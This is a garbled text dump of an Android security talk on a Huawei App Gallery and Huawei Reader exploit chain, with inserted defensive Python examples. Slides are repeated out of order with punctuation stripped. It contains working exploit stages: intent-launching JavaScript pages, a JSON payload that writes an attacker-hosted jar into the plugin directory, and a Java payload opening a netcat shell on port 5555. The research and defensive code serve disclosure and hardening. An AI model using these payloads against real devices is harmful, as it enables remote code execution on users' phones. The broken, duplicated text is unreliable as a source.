• Georgi Geshev, Rob Miller – https://labs.mwrinfosecurity.com/publications/logic-bug-hunting-in-chrome-on-android/

Whitepaper
• The full whitepaper can be found on the MWR Labs website (https://labs.mwrinfosecurity.com/publications/)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
• Android: what do we care about?
  – BROWSABLE intents (need to be web accessible) and Intents
  – Content we can load into the applications (either via a WebView or Media)
  – Controlled file writes / reads
  – Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible?
• Intent Proxy Bugs
• MITM stuff (SSL weaknesses)
19
Intent Proxy Example
• Android Vending
• LaunchUrlHandlerActivity
• We control the package name and URI

final Intent a(Intent arg17, b arg18, j arg19) {
    Intent v2_1;
    Uri v7 = arg17.getData();
    String v8 = v7.getQueryParameter("url");
    String v10 = v7.getQueryParameter("id");
    …
    if((v5) && (v12)) {
        v2_1 = new Intent("android.intent.action.VIEW");
        v2_1.setData(Uri.parse(v8));
        v2_1.setPackage(v10);
        return v2_1;
    }
    …
Toolset (Static Analysis)
• Rezord (internal) – Mass de-compilation of all apps
• JEB
• Grep
21
‘Jandroid’ – Static analysis
22
‘Jandroid’ – Static analysis
23
‘Jandroid’ – Static analysis
• For more info see the Chainspotting: Building Exploit Chains with Logic Bugs slides
https://infiltratecon.com/archives/[Infiltrate]%20Geshev%20and%20Miller%20-%20Logic%20Bug%20Hunting%20in%20Chrome%20on%20Android.pdf
24
Dynamic Analysis Toolset
Comparison table: Xposed and Frida rated on Global Hook, Flexible, Requires Root, Lightweight (cell values not recoverable)
• Xposed
  • Early injection (Zygote)
  • Global hooks across multiple applications
• Frida
  • Quick and easy prototyping
  • Debugging and dynamic analysis of obfuscated code
Vulnerabilities
Building an Exploit Chain
• So what do we need to do?
• Assuming no memory corruption
• BROWSABLE Intent / URI handler etc.
Chain: Browse to Website on Device → Code Exec and Profit
HiApp – Huawei Market Place (App Gallery)
29
HiApp – Whitelist Bypass (CVE-2018-7931)
30
<activity android:configChanges="orientation|screenSize"
    android:launchMode="singleTop"
    android:name="com.huawei.appmarket.service.externalapi.view.ThirdApiActivity"
    android:theme="@style/loading_activity_style">
    <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data android:host="details" android:scheme="appmarket" />
        <data android:host="search" android:scheme="market" />
        <data android:host="a.vmall.com" android:scheme="https" />
        <data android:host="com.huawei.appmarket" android:scheme="hiapp" />
    </intent-filter>
</activity>
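The "what do we care about" list on slide 18 and the manifest above both come down to the same triage step: enumerate the activities a web page can reach. The script below is an added example, not code from the deck or from MWR's Jandroid tooling. It parses an AndroidManifest.xml and lists every exported activity whose intent-filter carries android.intent.category.BROWSABLE, with the scheme/host pairs each one accepts. The manifest embedded in it is constructed for the example: the first activity mirrors the ThirdApiActivity entry shown on the slide, the second (.DebugOnlyActivity, a hypothetical name) is BROWSABLE but marked android:exported="false" to show that check.

```python
"""List BROWSABLE (web-reachable) activities from an AndroidManifest.xml."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
BROWSABLE = "android.intent.category.BROWSABLE"

# Constructed sample manifest for this example: the first activity mirrors the
# HiApp ThirdApiActivity entry on the slide, the second is BROWSABLE but not
# exported and so is not reachable from a web page.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.sample">
  <application>
    <activity android:name="com.huawei.appmarket.service.externalapi.view.ThirdApiActivity"
              android:launchMode="singleTop">
      <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data android:host="details" android:scheme="appmarket" />
        <data android:host="search" android:scheme="market" />
        <data android:host="a.vmall.com" android:scheme="https" />
        <data android:host="com.huawei.appmarket" android:scheme="hiapp" />
      </intent-filter>
    </activity>
    <activity android:name=".DebugOnlyActivity" android:exported="false">
      <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data android:scheme="debug" />
      </intent-filter>
    </activity>
  </application>
</manifest>
"""


def _attr(element, name):
    """Read an android:-namespaced attribute."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def browsable_entry_points(manifest_xml):
    """Return (component, scheme, host) triples for every BROWSABLE intent-filter
    on an exported activity. An activity that declares an intent-filter is
    exported unless android:exported="false" is set explicitly."""
    root = ET.fromstring(manifest_xml)
    found = []
    for component in root.iter():
        if component.tag not in ("activity", "activity-alias"):
            continue
        if _attr(component, "exported") == "false":
            continue
        name = _attr(component, "name")
        for flt in component.findall("intent-filter"):
            categories = {_attr(c, "name") for c in flt.findall("category")}
            if BROWSABLE not in categories:
                continue
            for data in flt.findall("data"):
                found.append((name, _attr(data, "scheme"), _attr(data, "host")))
    return found


def uri_prefixes(manifest_xml):
    """Group the entry points per component as 'scheme://host' prefixes, the
    form a reviewer wants when deciding what a web page could launch."""
    result = {}
    for name, scheme, host in browsable_entry_points(manifest_xml):
        prefix = "%s://%s" % (scheme or "*", host or "*")
        result.setdefault(name, []).append(prefix)
    return result


if __name__ == "__main__":
    for component, prefixes in uri_prefixes(SAMPLE_MANIFEST).items():
        print(component)
        for p in prefixes:
            print("   ", p)
```

Run it against a manifest pulled out of a decoded APK (apktool output is plain XML) to get the list of URI prefixes that reach each activity; a custom scheme such as hiapp:// or a cleartext http host on that list is where the rest of the deck's review starts.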
HiApp – Whitelist Bypass (CVE-2018-7931)
31
public List b() {
    if(b.a(this.a)) {
        this.a = new ArrayList();
        this.a.clear();
        this.a.add("hicloud.com$");
        this.a.add("vmall.com$");
        this.a.add("huawei.com$");
    }
    Iterator v1 = com.huawei.appmarket.service.whitelist.b.a().iterator();
    do {
        if(v1.hasNext()) {
            if(v1.next().booleanValue()) continue;
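The allowlist above is a set of $-anchored host patterns checked against a URL that the calling page supplies. As an added example (not code from the deck or from HiApp), the script below puts such a suffix-regex check beside an exact-host, HTTPS-only check and runs both over a few constructed URLs, including the cleartext http://www.vmall.com:8000 address that the next slide's stage1.html hands to the internal WebView. The patterns are assumed to be the literal strings shown (whether the real list escaped the dots is not visible on the slide), and which of the weaknesses demonstrated here the actual CVE-2018-7931 bypass relied on is not stated in the deck.

```python
"""Host allowlist checks: suffix regexes of the kind on the slide vs. an exact-host check."""
import re
from urllib.parse import urlsplit

# Patterns as they appear on the slide (punctuation restored). Assumed literal:
# the dot is an unescaped wildcard and nothing anchors the left-hand side.
SUFFIX_PATTERNS = ["hicloud.com$", "vmall.com$", "huawei.com$"]

# The same domains as plain strings for the strict check.
ALLOWED_HOSTS = {"hicloud.com", "vmall.com", "huawei.com"}


def suffix_regex_allows(url):
    """The weak check: any pattern matching anywhere at the end of the host
    passes, and the scheme is never looked at."""
    host = urlsplit(url).hostname or ""
    return any(re.search(pattern, host) for pattern in SUFFIX_PATTERNS)


def strict_allows(url):
    """Hardened check: HTTPS only, host normalised, then either the exact domain
    or a dot-delimited subdomain of it. No regex involved."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "https":
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if host in ALLOWED_HOSTS:
        return True
    return any(host.endswith("." + allowed) for allowed in ALLOWED_HOSTS)


def compare(url):
    """Return (weak_verdict, strict_verdict) so the difference is visible."""
    return suffix_regex_allows(url), strict_allows(url)


if __name__ == "__main__":
    # Constructed inputs: one genuine host, the cleartext stage1 target from the
    # next slide, a host that merely ends in the letters, and a wildcard-dot hit.
    for sample in ("https://www.vmall.com/",
                   "http://www.vmall.com:8000/stage2.html",
                   "https://attacker-vmall.com/",
                   "https://vmallxcom/"):
        print(sample, compare(sample))
```

The strict version still trusts every subdomain of the listed domains; if the WebView exposes a JavaScript bridge (as the CVE-2018-7932 slides show), the list should be as short as the feature allows and every entry must be HTTPS, because an allowlisted cleartext host is only as trustworthy as the network the phone is on.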
HiApp – stage1.html (CVE-2018-7931)
32
document.location = 'hiapp://com.huawei.appmarket?activityName=activityUri|webview.activity&params={"params":[{"name":"uri","type":"String","value":"internal_webview"},{"name":"url","type":"String","value":"http://www.vmall.com:8000/stage2.html"}]}&channelId=1';
Stage 1: Browse to Website on Device → BROWSABLE Intent → WebView → Code Exec and Profit
HiApp – JavaScript Bridge (CVE-2018-7932)
34
this.webview.getSettings().setJavaScriptEnabled(true);
this.webview.requestFocus();
this.webview.setWebViewClient(new InternalWebViewClient(this));
this.webview.setWebChromeClient(new MarketWebChromeClient(this));
this.webview.getSettings().setBlockNetworkImage(true);
this.webview.addJavascriptInterface(new HiSpaceObject(this.mContext, ((JsCallBackOjbect)this), this.webview), "HiSpaceObject");
HiApp – JavaScript Bridge (CVE-2018-7932)
35
@JavascriptInterface public void launchApp(String arg7, String arg8) {
    URISyntaxException v1_1;
    v0_1 = Intent.parseUri(arg8, 0);
    try {
        v0_1.setPackage(arg7);
        this.mActivity.startActivity(v0_1);
android-app URI Schema
36
http://androidxref.com/8.0.0_r4/xref/frameworks/base/core/java/android/content/Intent.java
android-app://package_id[/scheme[/host[/path]]][#Intent;...;end]
android-app://com.example.app/#Intent;action=com.example.MY_ACTION;i.some_int=100;S.some_str=hello;end
Action: com.example.MY_ACTION
Package: com.example.app
Extras: some_int=(int)100, some_str=(String)hello
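The grammar on this slide is what Intent.parseUri turns into a fully formed Intent, which is why handing an attacker-controlled string to it (as launchApp on the previous slide does) is equivalent to letting the page build the Intent itself. The parser below is an added example, not code from the deck or from Android: it follows the format shown above (package from the authority, optional /scheme/host/path data part, then the #Intent;...;end fragment with action=, component=, package=, category= and typed extras such as S. and i.) and rejects fields outside that grammar. The example URIs in the test and the main block are the one from the slide plus constructed ones.

```python
"""Parse android-app:// Intent URIs (the grammar on the slide) into their fields."""
from urllib.parse import unquote

PREFIX = "android-app://"

# Typed-extra prefixes accepted in the #Intent; fragment, mapped to converters.
EXTRA_TYPES = {
    "S": str,                              # S.name=value  -> String
    "B": lambda v: v.lower() == "true",    # B.name=true   -> boolean
    "i": int,                              # i.name=100    -> int
    "l": int,                              # l.name=...    -> long
    "s": int,                              # s.name=...    -> short
    "f": float,                            # f.name=...    -> float
    "d": float,                            # d.name=...    -> double
    "c": lambda v: v[0],                   # c.name=x      -> char
}


def parse_android_app_uri(uri):
    """Return a dict with package, data, action, component, categories and
    typed extras; raise ValueError for anything the format does not define."""
    if not uri.startswith(PREFIX):
        raise ValueError("not an android-app URI")
    body, _, fragment = uri.partition("#")
    segments = body[len(PREFIX):].split("/")
    intent = {
        "package": segments[0],
        "data": None,
        "action": None,
        "component": None,
        "categories": [],
        "extras": {},
    }
    # Optional data part after the package: /scheme[/host[/path]]
    data_parts = segments[1:]
    if data_parts and data_parts[0]:
        scheme = data_parts[0]
        if len(data_parts) > 1 and data_parts[1]:
            intent["data"] = scheme + "://" + "/".join(data_parts[1:])
        else:
            intent["data"] = scheme + ":"
    if not fragment:
        return intent
    if not (fragment.startswith("Intent;") and fragment.endswith(";end")):
        raise ValueError("malformed #Intent fragment")
    for field in fragment[len("Intent;"):-len(";end")].split(";"):
        if not field:
            continue
        key, _, value = field.partition("=")
        value = unquote(value)
        if key == "action":
            intent["action"] = value
        elif key == "component":
            intent["component"] = value
        elif key == "package":
            intent["package"] = value
        elif key == "category":
            intent["categories"].append(value)
        elif key in ("type", "launchFlags", "scheme", "sourceBounds"):
            intent[key] = value
        elif len(key) > 2 and key[1] == "." and key[0] in EXTRA_TYPES:
            intent["extras"][unquote(key[2:])] = EXTRA_TYPES[key[0]](value)
        else:
            raise ValueError("unknown field or extra type: " + key)
    return intent


def try_parse(uri):
    """Parse, returning None instead of raising, for triaging a batch of URIs."""
    try:
        return parse_android_app_uri(uri)
    except ValueError:
        return None


if __name__ == "__main__":
    # The slide's own example, then a constructed one that names a component.
    for sample in ("android-app://com.example.app/#Intent;action=com.example.MY_ACTION;i.some_int=100;S.some_str=hello;end",
                   "android-app://com.example.app/https/example.com/doc#Intent;component=com.example.app/.MainActivity;category=android.intent.category.DEFAULT;B.debug=true;end"):
        print(parse_android_app_uri(sample))
```

The useful reading of the output is the component and extras fields: a bridge method that passes a string like this to Intent.parseUri and then startActivity lets the page choose the target component and set typed extras (such as a url extra consumed by the receiving activity) directly, which is the step the stage2.html slide exercises. A bridge that needs to launch other apps should build the Intent itself from a fixed action and validated parameters rather than accept a serialised one.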
HiApp – stage2.html (CVE-2018-7932)
37
var pkg = "com.huawei.hwireader";
var uri = "android-app://http://www.google.co.uk/#Intent;component=com.huawei.hwireader/com.zhangyue.iReader.online.ui.ActivityWeb;action=com.huawei.hwireader.SHOW_DETAILS;url=http://192.168.137.1:8000/stage3.html;end";
window.HiSpaceObject.launchApp(pkg, uri);
Stage 2: Browse to Website on Device → BROWSABLE Intent → WebView → Exported Intent → WebView → Code Exec and Profit
Huawei Reader Application
39
Huawei Reader – Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8) {
    CharSequence v0_1;
    String v0;
    CharSequence v1 = null;
    super.onCreate(arg8);
    Intent v2 = this.getIntent();
    if(v2 != null) {
        Uri v3 = v2.getData();
        if(v3 != null) {
            v0 = v3.getScheme();
        }
        else {
            v0_1 = v1;
        }
        v0 = v2.getStringExtra("url");
        if(TextUtils.isEmpty(((CharSequence)v0))) {
            goto label_51;
        }
        this.loadRefreshUrl(v0);
Huawei Reader – Input Validation (CVE-2017-15308)
41
@JavascriptInterface public void do_command(String arg9) {
    String v4 = ((JSONObject)v2_3).getString("Action");
    LOG.I("js actionName " + v4);
    JSONObject v5 = ((JSONObject)v2_3).getJSONObject("Data");
    if(v4.equalsIgnoreCase("onlineReader")) {
        JSProtocol.mJSBookProtocol.online(v5);
        return;
    }
    if(v4.equalsIgnoreCase("readNow")) {
        JSProtocol.mJSBookProtocol.readNow(v5);
        return;
    }
Huawei Reader – Arbitrary Write / Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19, boolean arg20, boolean arg21) {
    v8 = 0;
    v10 = v4;
    v4_1 = 0;
    try {
        int v13 = v7.getInt("Type");
        v14 = v7.optInt("Version");
        v15 = v7.optBoolean("getDrmAuth", true);
        v3 = PATH.getBookDir() + v7.getString("FileName");
        v2 = v7.getInt("FileId");
        v6 = v7.getString("DownloadUrl");
Huawei Reader – Arbitrary Write / Directory Traversal (CVE-2017-15309)
43
function download_plugin() {
    var json = '{"Action":"onlineReader","Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8000/1aaaaa","Price":0},"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":32532639,"FileName":"plugins/DFService/classes.jar","FileSize":10000000,"Ebk3DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/4aaaaaa9q84q87reertw35wy5/test.zip","DownloadUrl":"https://s3-ap-northeast-1.amazonaws.com/k4aaaaaaertw35wy5/test.zip","Version":2}}}';
    window.ZhangYueJS.do_command(json);
}
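The decompiled line on slide 42, PATH.getBookDir() + FileName, is the whole input check: whatever the page puts in FileName is appended to the book directory, so a name containing separators (the plugins/DFService/classes.jar value above) or parent references lands wherever the attacker points it. The script below is an added example, not code from the deck or from the reader app; the directory name is the one shown on the later slide (/sdcard/HWiReader/books/). It models the concatenation as written, shows which names resolve outside the directory, and gives the check a download handler should apply instead: a single path component, resolved and confirmed to stay inside the target directory.

```python
"""Book-directory path handling: the slide's plain concatenation vs. a contained join."""
import posixpath

BOOK_DIR = "/sdcard/HWiReader/books/"  # directory name as shown on the slide


def naive_book_path(file_name):
    """Mirrors PATH.getBookDir() + FileName from the decompiled code: no validation."""
    return BOOK_DIR + file_name


def escapes_book_dir(file_name):
    """True if the name, resolved against BOOK_DIR, ends up outside it
    (parent references, absolute paths, or the directory itself)."""
    base = posixpath.normpath(BOOK_DIR)
    resolved = posixpath.normpath(posixpath.join(base, file_name))
    return not resolved.startswith(base + "/")


def safe_book_path(file_name):
    """Accept only a bare file name: no separators, no dot names, nothing that
    resolves outside the directory. Returns the resolved path or raises."""
    if not file_name or file_name in (".", "..") or "/" in file_name or "\\" in file_name:
        raise ValueError("FileName must be a single path component: %r" % file_name)
    if escapes_book_dir(file_name):
        raise ValueError("FileName resolves outside the book directory: %r" % file_name)
    return posixpath.join(posixpath.normpath(BOOK_DIR), file_name)


def try_safe_book_path(file_name):
    """safe_book_path with the rejection reported as None, for batch checks."""
    try:
        return safe_book_path(file_name)
    except ValueError:
        return None


if __name__ == "__main__":
    # Constructed inputs: the plugin path from the slide, a parent-directory
    # traversal, an absolute path, and an ordinary book file name.
    for name in ("plugins/DFService/classes.jar", "../../Download/x.jar",
                 "/data/local/tmp/x", "novel.epub"):
        print("%-32s naive=%-55s escapes=%-5s safe=%s" % (
            name, naive_book_path(name), escapes_book_dir(name), try_safe_book_path(name)))
```

The separator check matters as much as the containment check: the slide's FileName never leaves the books tree, it just reaches a subdirectory the app later loads code from, and a pure "is it still under the base directory" test would have accepted it. In Java the containment half is new File(dir, name).getCanonicalPath() compared against dir.getCanonicalPath() plus File.separator; the single-component rule is a plain string check before that.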
Stage 3: Browse to Website on Device → BROWSABLE Intent → WebView → Exported Intent → WebView → File Write → Code Exec and Profit
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10) {
    boolean v0_2;
    try {
        int v3 = arg10.getInt("StartIndex");
        int v4 = arg10.getInt("EndIndex");
        String v2 = arg10.getString("Price");
        int v1 = arg10.getInt("BookId");
        String v5 = arg10.getString("PayURL");
        String v0_1 = arg10.getString("DownloadURL");
        String v7 = PATH.getBookDir() + arg10.getString("FileName");
        if((FILE.isExist(PATH.getBookNameCheckOpenFail(v7))) && DEVICE.getNetType() != 0xFFFFFFFF) {
            FILE.delete(PATH.getBookCachePathNamePostfix(v7));
            FILE.delete(v7);
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2) {
    return PATH.getOpenFailDir() + MD5.getMD5(arg2);
}
public static String getOpenFailDir() {
    return PATH.getWorkDir() + "books/openfail/";
}
Huawei Reader – Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 = plugins/DFService/classes.jar
/sdcard/HWiReader/books/openfail/5457bea93d0548a4d84357308df45322
/sdcard/HWiReader/books/plugins/DFService/classes.jar
Huawei Reader – Insecure Plugin Loading
48
public static Class loadPlug(Context arg4, String arg5, String arg6) throws Exception {
    return new DexClassLoader(arg5, arg4.getApplicationInfo().dataDir, null, arg4.getClassLoader()).loadClass(arg6);
}
protected final ArrayList P() {
    if(pR == null) {
        try {
            PlatForm v3 = new PlatForm();
            Object v2 = Util.loadPlug(APP.getAppContext(), v3.getPlugDir("DFService") + "classes.jar", "com.zhangyue.iReader.PlugService.DocFeature").newInstance();
            v2.setPlatform(((IPlatform)v3));
            pR = ((IPlugDFService)v2);
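loadPlug above hands a jar from a path under external storage straight to DexClassLoader, so any process that can write that path (here, the reader's own download handler fed by a web page) gets its code run in the app. The script below is an added example, not code from the deck or from the reader app, showing the guard a plugin loader of this shape needs: copy the file into app-private storage first, verify its digest against a value pinned in the app, and only then pass the private copy to the loader. The plugin bytes, the pinned digest and the loader callable are all constructed for the example; in the real app the loader is DexClassLoader and the pin is compiled in (or replaced by a signature check against an embedded key).

```python
"""Guarded plugin loading: copy to private storage, verify a pinned digest, then load."""
import hashlib
import os
import shutil
import tempfile

# Constructed stand-in for the plugin the app shipped. The pinned digest must
# live inside the app (compiled in), never on the same storage as the plugin.
SHIPPED_PLUGIN = b"PK\x03\x04 constructed classes.jar stand-in"
PINNED_SHA256 = hashlib.sha256(SHIPPED_PLUGIN).hexdigest()


def sha256_of_file(path):
    """Stream the file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def load_plugin_checked(external_path, private_dir, expected_sha256, loader):
    """Replacement for the unchecked Util.loadPlug pattern on the slide.
    1. Copy the file out of the shared location into app-private storage, so the
       bytes that are verified are the bytes that get loaded (verifying in place
       on /sdcard leaves a window in which another writer can swap the file).
    2. Compare the private copy's digest with the pinned value.
    3. Only then hand the private copy to the real loader."""
    private_copy = os.path.join(private_dir, "plugin.jar")
    shutil.copyfile(external_path, private_copy)
    actual = sha256_of_file(private_copy)
    if actual != expected_sha256:
        os.remove(private_copy)
        raise RuntimeError("plugin digest mismatch: refusing to load")
    return loader(private_copy)


def demo(plugin_bytes):
    """Write plugin_bytes to a temporary 'external' location and attempt the
    guarded load. Returns True if the load was allowed, False if refused."""
    with tempfile.TemporaryDirectory() as external, tempfile.TemporaryDirectory() as private:
        ext_path = os.path.join(external, "classes.jar")
        with open(ext_path, "wb") as f:
            f.write(plugin_bytes)
        try:
            # The loader here just reports the size; DexClassLoader would go here.
            load_plugin_checked(ext_path, private, PINNED_SHA256, lambda p: os.path.getsize(p))
            return True
        except RuntimeError:
            return False


if __name__ == "__main__":
    print("shipped plugin loads:   ", demo(SHIPPED_PLUGIN))
    print("tampered plugin loads:  ", demo(SHIPPED_PLUGIN + b" extra bytes"))
    print("replacement jar loads:  ", demo(b"PK\x03\x04 constructed replacement"))
```

A digest pin only covers plugins known at build time; if plugins are updated over the network the check becomes a signature verification with the public key embedded in the app, and the download itself should go over TLS. Either way the fix that removes the bug class is to keep loadable code out of world-writable storage altogether.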
Huawei Reader – Insecure Plugin Loading
49
function download_plugin() {
    document.writeln("++ Downloading replacement classes.jar ++");
    // It should be noted that FileId needs to be unique for the download to work correctly
    var json = '{"Action":"onlineReader","Data":{"Charging":{"FeeType":0,"OrderUrl":"http://192.168.137.1:8000/1aaaaa","Price":0},"DownloadInfo":{"ChapterId":1,"FeeUnit":10,"Type":1,"FileId":' + PLUGIN_FILE_ID + ',"FileName":"plugins/DFService/classes.jar","FileSize":10000000,"Ebk3DownloadUrl":"' + PLUGIN_URI + '","DownloadUrl":"' + PLUGIN_URI + '","Version":2}}}';
    window.ZhangYueJS.do_command(json);
}
Huawei Reader – Payload Creation
50
package com.zhangyue.iReader.PlugService;

import android.util.Log;
import java.io.IOException;

public class DocFeature {
    public DocFeature() {
        // Constructor of com.zhangyue.iReader.PlugService.DocFeature, the class the reader instantiates from the plugin jar
        Log.e("ATTACKER", "RUNNING ARBITRARY CODE");
        String cmd = "/data/data/com.huawei.hwireader/busybox nc -l -p 5555 -e /data/data/com.huawei.hwireader/busybox sh";
        try {
            Runtime.getRuntime().exec(cmd);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
Demo
51
Questions
52
Credits
• Georgi Geshev, Rob Miller – https://labs.mwrinfosecurity.com/publications/logic-bug-hunting-in-chrome-on-android/new-blog-post
53
Whitepaper
54
• Full whitepaper can be found on the MWR Labs website (https://labs.mwrinfosecurity.com/publications/nhuawew-blog-post)
PUBLIC
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
